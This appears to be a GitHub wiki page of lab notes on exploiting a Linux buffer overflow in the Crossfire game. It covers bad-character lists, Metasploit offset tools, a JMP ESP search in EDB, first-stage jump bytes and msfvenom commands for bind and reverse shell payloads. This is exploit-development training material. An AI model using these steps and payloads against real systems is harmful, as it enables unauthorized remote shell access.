-
Notifications
You must be signed in to change notification settings - Fork 14
Linux Buffer Overflow
lethanhtung01011980 edited this page Dec 5, 2019
·
19 revisions
- EIP => JMP ESP => ESP containing payload
- In Crossfire: EIP => JMP ESP => EAX + 12 bytes containing payload
- 0x00 (Null)
- 0x0A (New Line '\n')
- 0x0D (Carriage Return '\r')
- 0x20 (ASCII Space)
- Evans debugger: edb --run /usr/games/crossfire/bin/crossfire
- Click RUN twice to run
- Depends on program
- /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 4379
- /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 4379 -q 46367046
- Run the attacking payload
- EDB > Plugín > OpCodeSearcher > Opcode Search > ESP -> EIP
- /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
- nasm > add eax,12
- 00000000 83C00C add eax,byte +0xc
- nasm > jmp eax
- 00000000 FFE0 jmp eax
Hence need \x83\xc0\x0c\xff\xe0 in payload to jump 12 characters.
- We updated our script to JMP ESP.
-
Before running crossfire, put a breakpoint at JMP ESP address
-
EIP is pointing at x08134596 as expected. It is a JMP ESP.
-
Press F8 Step over to execute JMP ESP (at EIP address). The program will execute first stage shell code to jump to EAX + 12. 0xc is 12 in decimal.
-
Step over again to see EAX is now AAAAAAAAA…as expected. “Setup sound” is removed.
- Shell bind tcp:
msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f python -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
- Reverse shell payload:
msfvenom -p linux/x86/shell_reverse_tcp LPORT=4444 -f python -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai